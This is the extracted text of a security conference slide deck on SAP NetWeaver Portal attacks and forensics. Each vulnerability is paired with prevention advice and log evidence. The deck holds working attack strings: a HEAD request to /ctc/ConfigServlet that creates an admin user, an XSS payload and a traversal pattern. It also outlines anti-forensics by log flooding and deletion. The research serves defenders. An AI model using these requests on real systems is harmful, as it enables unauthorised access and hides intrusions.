Professional Documents
Culture Documents
to secure investments
ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat
(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security
from ERP and web security to mobile, embedded devices, and
critical infrastructure, accumulating their knowledge on SAP
research.
Leading SAP AG partner in the field of discovering security
vulnerabilities by the number of found vulnerabilities
erpscan.com
Dmitry Chastukhin
erpscan.com
Agenda
SAP security
Conclusion
erpscan.com
SAP
erpscan.com
SAP security
Espionage
Stealing financial information
Stealing corporate secrets
Stealing supplier and customer lists
Stealing HR data
Fraud
False transactions
Modification of master data
Sabotage
Denial of service
Modification of financial reports
Access to technology network (SCADA) by trust relations
erpscan.com
SAP security
35
30
25
20
15
10
BlackHat
Defcon
HITB
RSA
CONFidence
DeepSec
Hacktivity
Troopers
Source
2003
2004
2005
2006
2007
2008
2009
2010
2011
2012
2013
erpscan.com
Is it remotely exploitable?
sapscan.com
World
8
SAP Dispatcher
erpscan.com
SAP MMC
SAP HostControl
10
erpscan.com
11
SAP Forensics
If there are no attacks, it doesnt mean anything
erpscan.com
12
70%
10%
4%
2%
2%
implementations.
erpscan.com
13
What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close We need to monitor
them, at least
erpscan.com
14
Awareness
SAProuter
Disable them
erpscan.com
15
erpscan.com
16
EP architecture
erpscan.com
17
erpscan.com
18
SAP Logging
If you are running an ABAP + Java installation of Web AS with
SAP Web Dispatcher as a load balancing solution, you can safely
disable logging of HTTP requests and responses on J2EE Engine,
and use the corresponding CLF logs of SAP Web Dispatcher. This
also improves the HTTP communication performance. The only
drawback of using the Web Dispatchers CLF logs is that no
information is available about the user executing the request
(since the user is not authenticated on the Web Dispatcher, but
on the J2EE Engine instead).
SOURCE: SAP HELP
*Not the only. There are many complex attacks with POST requests.
erpscan.com
19
erpscan.com
20
erpscan.com
21
erpscan.com
22
erpscan.com
23
erpscan.com
24
But
The attacker must have credentials to read the log file
WRONG!
erpscan.com
25
26
Prevention
27
Prevention
The HTTP Provider service can mask securitysensitive URL parameters, cookies, or headers
By default, only for the headers listed below
Path Parameter: jsessionid
Request Parameters: j_password, j_username,
j_sap_password, j_sap_again, oldPassword,
confirmNewPassword,ticket
HTTP Headers: Authorization, Cookie (JSESSIONID,
MYSAPSSO2)
28
erpscan.com
29
Access Control
Declarative
Programmatic
By WEB.XML
By UME
Web Dynpro
Portal iViews
J2EE Web apps
erpscan.com
- programmatic
- programmatic
- declarative
30
Access Control
The central entity in the J2EE authorization model is the security
role
Programmers define the application-specific roles in the J2EE
deployment descriptor
web.xml
erpscan.com
web-j2ee-engine.xml
31
web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
Verb Tampering
erpscan.com
32
Verb Tampering
If we are trying to get access to an application using GET we
need a login:pass and administrator role
What if we try to get access to application using HEAD instead
GET?
PROFIT!
Did U know about ctc?
erpscan.com
33
Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
CREATEUSER;USERNAME=CONF,PASSWORD=idence
34
Prevention
erpscan.com
35
Investigation
[Apr 3, 2013 1:23:59 AM
] - 192.168.192.14
: GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM
] - 192.168.192.14
: HEAD /ctc/ConfigServlet HTTP/1.1 200 0
36
web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servletclass>
</servlet>
GET /admin/critical/CriticalAction
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
GET /servlet/com.sap.admin.Critical.Action
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
<http-method>HEAD</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
Invoker servlet
</security-constraint>
erpscan.com
37
Invoker Servlet
Want to execute an OS command on J2EE server remotely?
Maybe upload a backdoor in a Java class?
Or sniff all traffic?
erpscan.com
38
Invoker Servlet
erpscan.com
39
Prevention
erpscan.com
40
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352
03#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa
p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA
Transaction :
[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A
pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut
il.SecurityAudit#Plain###Guest
| USER.CREATE |
USER.PRIVATE_DATASOURCE.un:CONF
|
| SET_ATTRIBUTE:
uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service
s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000
c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.
sap.engine.services.security.roles.audit#Java###{0}:
Authorization check for caller assignment to J2EE security role
[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
erpscan.com
41
Investigation
erpscan.com
41
XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal
EPCF
erpscan.com
43
EPCF
EPCF provides a JavaScript API designed for the client-side
communication between portal components and the portal core
framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page
or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
</SCRIPT>
For example, EPCF used for transient user data buffer for iViews
erpscan.com
44
Prevention
erpscan.com
45
Investigation
#Plain###192.168.192.26 : GET
/irj/servlet/prt/portal/prtroot/com.sap.porta
l.usermanagement.admin.UserMapping?systemid=M
S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(
%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
j2ee\cluster\<node>\log\system\httpaccess\res
ponses.trc
erpscan.com
46
erpscan.com
47
48
Investigation
No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in
responses.log
But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET
/webdynpro/resources/sap.com/tc~lm~webadmin~log_config
~wd/Components/com.sap.tc.log_configurator.LogConfigur
ator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes
erpscan.com
49
Investigation
erpscan.com
50
Directory traversal
FIX
erpscan.com
51
erpscan.com
52
Prevention
erpscan.com
53
Investigation
/../
!252f..!252f
erpscan.com
54
erpscan.com
55
Directory Traversal
OS Command execution
XML External Entity (XXE)
erpscan.com
56
erpscan.com
57
XXE in Portal
erpscan.com
58
XXE in Portal
erpscan.com
59
XXE
60
erpscan.com
61
erpscan.com
62
erpscan.com
63
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu
eur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq
Dp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI
0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr
4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7
5eC6/5S3E
erpscan.com
64
config.properties
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
erpscan.com
65
erpscan.com
66
Prevention
erpscan.com
67
Investigation
POST
/irj/servlet/prt/portal/prteventname/HtmlbE
vent/prtroot/pcd!3aportal_content!2fadminis
trator!2fsuper_admin!2fsuper_admin_role!2fc
om.sap.portal.content_administration!2fcom.
sap.portal.content_admin_ws!2fcom.sap.km.Ad
minContent!2fcom.sap.km.AdminContentExplore
r!2fcom.sap.km.AdminExplorer/ HTTP/1.1
erpscan.com
68
Investigation
The only one way to get HTTP POST request values is to enable
HTTP Trace
Visual Administrator Dispatcher HTTP Provider
Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher:
/j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server
\j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
69
erpscan.com
70
erpscan.com
71
erpscan.com
72
erpscan.com
73
erpscan.com
74
erpscan.com
75
Portal post-exploitation
Lot of links to other systems in corporate LAN
Using SSRF, attackers can get access to these systems
What is
erpscan.com
SSRF?
76
Packet A
Packet B
erpscan.com
77
HTTP Server
Corporate
network
Direct attack
GET /vuln.jsp
SSRF Attack
Get /vuln.jst
SSRF Attack
erpscan.com
78
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
79
Portal post-exploitation
erpscan.com
80
Anti-forensics
erpscan.com
81
Anti-forensics
Flooding
Deleting
Changing
erpscan.com
82
Anti-forensics
Log flooding
5 active logs
Maximum log file size is 10 Mb
Archiving when all logs reach the maximum size
If file.0.log -> max size then open file.1.log
If file.4.log -> max size then zip all and backup
Rewriting the same files after archiving
erpscan.com
83
Anti-forensics
Log deleting
SAP locks write access to the only one active log
SAP allows reading/writing logs, so it is possible to delete them
It could compromise the attackers presence
Log changing
SAP locks write access only to the one active log
It is possible to write into any other log file
erpscan.com
84
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
Own scripts, parse common patterns
ERPScan has all existing web vulns/0-day patterns
erpscan.com
85
Conclusion
It is possible to protect yourself from these kinds of issues,
and we are working close with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
Future work
I'd like to thank SAP's Product Security Response Team for the
great cooperation to make SAP systems more secure. Research
is always ongoing, and we can't share all of it today. If you want
to be the first to see new attacks and demos, follow us at
@erpscan and attend future presentations:
July 31 BlackHat (Las Vegas, USA)
erpscan.com
87
Web:
www.erpscan.com
e-mail: info@erpscan.com
Twitter:
@erpscan
@_chipik
@neyolov